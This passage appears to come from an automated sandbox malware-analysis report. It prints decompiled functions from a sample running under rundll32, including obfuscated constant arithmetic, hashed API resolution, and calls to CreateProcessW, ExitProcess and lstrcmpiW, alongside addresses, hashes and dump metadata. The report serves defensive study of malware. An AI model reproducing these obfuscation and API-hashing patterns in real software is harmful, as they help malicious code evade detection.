                                                                                                                                                                            0x04c52c37
                                                                                                                                                                            0x04c52c3a
                                                                                                                                                                            0x04c52c3d
                                                                                                                                                                            0x04c52c3e
                                                                                                                                                                            0x04c52c41
                                                                                                                                                                            0x04c52c44
                                                                                                                                                                            0x04c52c47
                                                                                                                                                                            0x04c52c4a
                                                                                                                                                                            0x04c52c4b
                                                                                                                                                                            0x04c52c4e
                                                                                                                                                                            0x04c52c4f
                                                                                                                                                                            0x04c52c51
                                                                                                                                                                            0x04c52c52
                                                                                                                                                                            0x04c52c57
                                                                                                                                                                            0x04c52c61
                                                                                                                                                                            0x04c52c64
                                                                                                                                                                            0x04c52c67
                                                                                                                                                                            0x04c52c6e
                                                                                                                                                                            0x04c52c72
                                                                                                                                                                            0x04c52c76
                                                                                                                                                                            0x04c52c7d
                                                                                                                                                                            0x04c52c84
                                                                                                                                                                            0x04c52c8b
                                                                                                                                                                            0x04c52c92
                                                                                                                                                                            0x04c52c99
                                                                                                                                                                            0x04c52ca0
                                                                                                                                                                            0x04c52ca4
                                                                                                                                                                            0x04c52cab
                                                                                                                                                                            0x04c52cb2
                                                                                                                                                                            0x04c52cb9
                                                                                                                                                                            0x04c52cc0
                                                                                                                                                                            0x04c52cc7
                                                                                                                                                                            0x04c52ce8
                                                                                                                                                                            0x04c52d02
                                                                                                                                                                            0x04c52d09

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 04C52D02
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.265146904.0000000004C31000.00000020.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.265140219.0000000004C30000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 0000000B.00000002.265175007.0000000004C56000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_4c30000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                            • String ID: 3HS
                                                                                                                                                                            • API String ID: 963392458-330188696
                                                                                                                                                                            • Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                                                                                            • Instruction ID: 7a8073d7bcb1d7230b952c7043c04715b77348310da1040e1d534d36206a854b
                                                                                                                                                                            • Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                                                                                            • Instruction Fuzzy Hash: 6F21F372800248BBCF159F96DC0ACDFBFB9EF85704F108188F915A2220C3B59A24DFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 68 4c4d11a-4c4d1bb call 4c3eb52 ExitProcess
                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E04C4D11A() {
                                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				void* _t39;
                                                                                                                                                                            
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v36 = 0x78f5c7;
                                                                                                                                                                            				_v32 = 0xa12bb9;
                                                                                                                                                                            				_v28 = 0x4eca09;
                                                                                                                                                                            				_v8 = 0x8b256f;
                                                                                                                                                                            				_v8 = _v8 << 0xb;
                                                                                                                                                                            				_v8 = _v8 ^ 0x4a7d0011;
                                                                                                                                                                            				_v8 = _v8 >> 9;
                                                                                                                                                                            				_v8 = _v8 ^ 0x00073d60;
                                                                                                                                                                            				_v20 = 0x1e549a;
                                                                                                                                                                            				_v20 = _v20 + 0xffffad33;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00134b4f;
                                                                                                                                                                            				_v16 = 0x8dd9dd;
                                                                                                                                                                            				_v16 = _v16 << 3;
                                                                                                                                                                            				_v16 = _v16 ^ 0x0460bc3c;
                                                                                                                                                                            				_v12 = 0x358059;
                                                                                                                                                                            				_v12 = _v12 + 0xb97b;
                                                                                                                                                                            				_v12 = _v12 ^ 0x003502df;
                                                                                                                                                                            				E04C3EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
                                                                                                                                                                            				ExitProcess(0);
                                                                                                                                                                            			}












                                                                                                                                                                            0x04c4d120
                                                                                                                                                                            0x04c4d124
                                                                                                                                                                            0x04c4d12b
                                                                                                                                                                            0x04c4d132
                                                                                                                                                                            0x04c4d139
                                                                                                                                                                            0x04c4d140
                                                                                                                                                                            0x04c4d144
                                                                                                                                                                            0x04c4d14b
                                                                                                                                                                            0x04c4d14f
                                                                                                                                                                            0x04c4d156
                                                                                                                                                                            0x04c4d15d
                                                                                                                                                                            0x04c4d164
                                                                                                                                                                            0x04c4d16b
                                                                                                                                                                            0x04c4d172
                                                                                                                                                                            0x04c4d176
                                                                                                                                                                            0x04c4d17d
                                                                                                                                                                            0x04c4d184
                                                                                                                                                                            0x04c4d18b
                                                                                                                                                                            0x04c4d1ac
                                                                                                                                                                            0x04c4d1b6

                                                                                                                                                                            APIs
                                                                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 04C4D1B6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.265146904.0000000004C31000.00000020.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.265140219.0000000004C30000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 0000000B.00000002.265175007.0000000004C56000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_4c30000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                            • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                                                                                            • Instruction ID: c6af08a31e63713765de27561d717dd3fc41db0e5432ffd9ee7dd5058c806bad
                                                                                                                                                                            • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                                                                                            • Instruction Fuzzy Hash: 2711E2B1C4430DEBDB54DFE5D94A6DEFBB0EB00749F108588D521B6250D3B89B489F91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 86 4c5061d-4c506eb call 4c4fe29 call 4c3eb52 lstrcmpiW
                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                            			E04C5061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            				int _t53;
                                                                                                                                                                            				WCHAR* _t56;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_t56 = __edx;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E04C4FE29(_t44);
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v28 = 0xcd60b7;
                                                                                                                                                                            				_v12 = 0x7257ab;
                                                                                                                                                                            				_v12 = _v12 << 0xd;
                                                                                                                                                                            				_v12 = _v12 + 0x8f69;
                                                                                                                                                                            				_v12 = _v12 * 0x4c;
                                                                                                                                                                            				_v12 = _v12 ^ 0x410f7a13;
                                                                                                                                                                            				_v8 = 0x7b4696;
                                                                                                                                                                            				_v8 = _v8 + 0xffff4950;
                                                                                                                                                                            				_v8 = _v8 | 0x2a0f624b;
                                                                                                                                                                            				_v8 = _v8 * 0x3a;
                                                                                                                                                                            				_v8 = _v8 ^ 0xa0f3ec54;
                                                                                                                                                                            				_v20 = 0x8a2161;
                                                                                                                                                                            				_v20 = _v20 + 0xffff45ea;
                                                                                                                                                                            				_v20 = _v20 ^ 0x1b6c7fa6;
                                                                                                                                                                            				_v20 = _v20 ^ 0x1be8dede;
                                                                                                                                                                            				_v16 = 0xdcc12a;
                                                                                                                                                                            				_v16 = _v16 + 0xb9f4;
                                                                                                                                                                            				_v16 = _v16 + 0xffffcfef;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00d9de04;
                                                                                                                                                                            				E04C3EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
                                                                                                                                                                            				_t53 = lstrcmpiW(_a4, _t56); // executed
                                                                                                                                                                            				return _t53;
                                                                                                                                                                            			}












                                                                                                                                                                            0x04c50624
                                                                                                                                                                            0x04c50627
                                                                                                                                                                            0x04c50629
                                                                                                                                                                            0x04c5062c
                                                                                                                                                                            0x04c5062f
                                                                                                                                                                            0x04c50630
                                                                                                                                                                            0x04c50631
                                                                                                                                                                            0x04c50636
                                                                                                                                                                            0x04c5063d
                                                                                                                                                                            0x04c50644
                                                                                                                                                                            0x04c5064b
                                                                                                                                                                            0x04c5064f
                                                                                                                                                                            0x04c50667
                                                                                                                                                                            0x04c5066a
                                                                                                                                                                            0x04c50671
                                                                                                                                                                            0x04c50678
                                                                                                                                                                            0x04c5067f
                                                                                                                                                                            0x04c5068b
                                                                                                                                                                            0x04c5068e
                                                                                                                                                                            0x04c50695
                                                                                                                                                                            0x04c5069c
                                                                                                                                                                            0x04c506a3
                                                                                                                                                                            0x04c506aa
                                                                                                                                                                            0x04c506b1
                                                                                                                                                                            0x04c506b8
                                                                                                                                                                            0x04c506bf
                                                                                                                                                                            0x04c506c6
                                                                                                                                                                            0x04c506d9
                                                                                                                                                                            0x04c506e5
                                                                                                                                                                            0x04c506eb

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04C506E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.265146904.0000000004C31000.00000020.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.265140219.0000000004C30000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 0000000B.00000002.265175007.0000000004C56000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_4c30000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                                            • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                                                                                            • Instruction ID: d5fc8624274af980e748084638afc8a9ef02e62c2d1ed98769f74778e2daeec3
                                                                                                                                                                            • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                                                                                            • Instruction Fuzzy Hash: 062110B1C01309ABCF14DFA9D9899DEBFB5FB20358F108298E529A6251D3B49B04DF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Non-executed Functions